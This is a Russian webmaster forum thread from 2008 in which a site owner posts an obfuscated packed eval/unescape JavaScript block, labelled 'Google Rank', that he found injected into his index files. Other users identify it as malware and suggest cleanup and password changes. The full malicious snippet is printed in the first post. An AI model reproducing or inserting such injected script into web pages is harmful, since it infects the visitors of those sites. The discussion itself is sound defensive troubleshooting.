X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> кто нибудь с таким сталкивался?
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 20:35; Ответить: agentvini
Сообщение #1


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


заметил в индекс файлах появление такого вот кода:

<!-- o --><!-- Google Rank -->
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e©+'\b','g'),k[c])}}return p}('o(n("%7%l%d%1%j%9%k%h%m%p%t%s%h%9%r%i%2%1%0%0%6%d%2%1%0%0%3%8%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%e%2%1%0%0%3%7%2%1%0%0%3%c%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%5%2%1%0%0%3%6%2%1%0%0%6%7%2%1%0%0%3%f%2%1%0%0%4%a%2%1%0%0%4%a%2%1%0%0%4%0%2%1%0%0%6%g%2%1%0%0%5%b%2%1%0%0%5%b%2%1%0%0%3%4%2%1%0%0%3%b%2%1%0%0%3%b%2%1%0%0%3%4%2%1%0%0%3%d%2%1%0%0%3%c%2%1%0%0%5%7%2%1%0%0%4%a%2%1%0%0%3%b%2%1%0%0%4%0%2%1%0%0%5%9%2%1%0%0%3%8%2%1%0%0%3%9%2%1%0%0%5%0%2%1%0%0%4%4%2%1%0%0%3%8%2%1%0%0%3%a%2%1%0%0%4%a%2%1%0%0%3%f%2%1%0%0%6%7%2%1%0%0%6%e%2%1%0%0%5%0%2%1%0%0%3%f%2%1%0%0%3%c%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0%0%3%f%2%1%0%0%4%a%2%1%0%0%6%7%2%1%0%0%6%e%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%a%2%1%0%0%4%8%2%1%0%0%3%d%2%1%0%0%3%c%2%1%0%0%6%7%2%1%0%0%5%5%2%1%0%0%3%a%2%1%0%0%3%8%2%1%0%0%4%6%2%1%0%0%4%0%2%1%0%0%3%d%2%1%0%0%3%e%2%1%0%0%4%8%2%1%0%0%6%g%2%1%0%0%3%9%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%3%c%2%1%0%0%5%5%2%1%0%0%6%9%2%1%0%0%6%d%2%1%0%0%5%b%2%1%0%0%3%8%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%e%2%1%0%0%3%7%2%1%0%0%3%c%2%1%0%0%6%9%i%u%q"));',31,31,'30|75|5C|36|37|32|33|64|39|65|34|66|35|63|31|38|61|74|27|6D|6E|6F|2E|unescap
e|eval|77|3B|28|69|72|29'.split('|'),0,{}));
</script>
<!-- Google Rank --><!-- c -->


кто нибудь с таким сталкивался?
пасс на фтп сменил


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mr4q
mr4q
сообщение 12.7.2008, 20:41; Ответить: mr4q
Сообщение #2


Верстаю дорого
*****

Группа: Active User
Сообщений: 697
Регистрация: 18.9.2007
Из: Харьков, Украина
Поблагодарили: 325 раз
Репутация:   79  


помоему вредоносный код запихали smile.gif сталкивались..не скажу что код такой же был, но почти - зашифрованный ) удаляй и меняй пассы

Сообщение отредактировал mr4q - 12.7.2008, 20:45


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
UEM
UEM
сообщение 12.7.2008, 20:45; Ответить: UEM
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 410
Регистрация: 28.12.2007
Поблагодарили: 22 раза
Репутация:   23  


чёт не известное, я бы выкосил нах, если сам его не пихал


--------------------
консультант по ремонту мобил
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 20:45; Ответить: agentvini
Сообщение #4


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


(mr4q @ 12.7.2008, 19:41) *
помоему вредоносный код запихали smile.gif сталкивались..не скажу что код такой же был, но почти - зашифрованный )


Вы тогда смогли определить путь его проникновения?


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mr4q
mr4q
сообщение 12.7.2008, 20:47; Ответить: mr4q
Сообщение #5


Верстаю дорого
*****

Группа: Active User
Сообщений: 697
Регистрация: 18.9.2007
Из: Харьков, Украина
Поблагодарили: 325 раз
Репутация:   79  


agentvini, нет, я не пытался..удалил, сменил все пассы, поганял антивирусом по сайту и все )


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Guerrilla
Guerrilla
сообщение 12.7.2008, 20:49; Ответить: Guerrilla
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 550
Регистрация: 2.3.2008
Из: Мир
Поблагодарили: 115 раз
Репутация:   15  


Конечно это вредоносный скрипт вам подсунули! Типа xss уязвимость в вашем движке и т.п.
Вместо eval попробуй подставить echo, чтобы увидеть суть. Или просто скопируй сам скрипт (выше приведённый, без <!-- o --><!-- Google Rank --> сверху и снизу) в адресную строку браузера))) Каспер заорёт, значит оно самое) жуки заползали. Чистить надо и избавлятся от дыр, если это не баг хоста.


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 20:59; Ответить: agentvini
Сообщение #7


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


спасибо народ.
хост америкоский (держат Россияне) http://thejethost.com/
когда то была проблема с двиглом, я тогда обратился в супорт, просканили мой акк, сказали где баг был.
после фикса дыр, и смены пассов все было нормально. похоже опять...


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Nemo
Nemo
сообщение 12.7.2008, 21:25; Ответить: Nemo
Сообщение #8


Оптимизатор
*******

Группа: Active User
Сообщений: 3143
Регистрация: 22.8.2007
Поблагодарили: 457 раз
Репутация:   163  


какой двиг то?


--------------------
Крауд-маркетинг, ссылки покупаю здесь
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 21:50; Ответить: agentvini
Сообщение #9


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


(Nemo @ 12.7.2008, 21:25) *
какой двиг то?

оськомерц вам эдишн

походу проблему нашел - был бекап из зараженного архива.
Всем спасибо.




Устное предупреждение, за Duble posting - Vaskes

Сообщение отредактировал agentvini - 13.7.2008, 16:24


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mister_cc
mister_cc
сообщение 12.7.2008, 23:29; Ответить: mister_cc
Сообщение #10


Бывалый
****

Группа: User
Сообщений: 252
Регистрация: 12.7.2008
Из: wild wild web (WWW)
Поблагодарили: 27 раз
Репутация:   6  


Вы не нашли проблему=\
Так можно сказать, когда вы узнаете куда идут отчёты и какой функционал у данного сплоета, а так вы просто отреагировали.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) 10 бесплатных сервисов Google для бизнеса, о которых мало кто слышал
37 jack 11378 22.5.2018, 2:36
автор: EconDude
Открытая тема (нет новых ответов) Кто накрутит живых пользователей в Фейсбук?
только живые
6 nazar2292 1022 5.5.2018, 20:58
автор: koldovsky
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКто и что читает?
Любимые и не только, книги.
300 Levels 36690 26.4.2018, 23:41
автор: Saturn1984
Открытая тема (нет новых ответов) Вопрос к тем, кто зарабатывает на недвижимости?
Как заработать на недвижке.?
15 Dross 2764 26.4.2018, 18:26
автор: megachange
Открытая тема (нет новых ответов) Есть кто с Брянской области?
нужно сравнить цены на топливо
8 EvilGomel 486 13.4.2018, 21:26
автор: ВераЩ


 



RSS Текстовая версия Сейчас: 28.5.2018, 9:42
Дизайн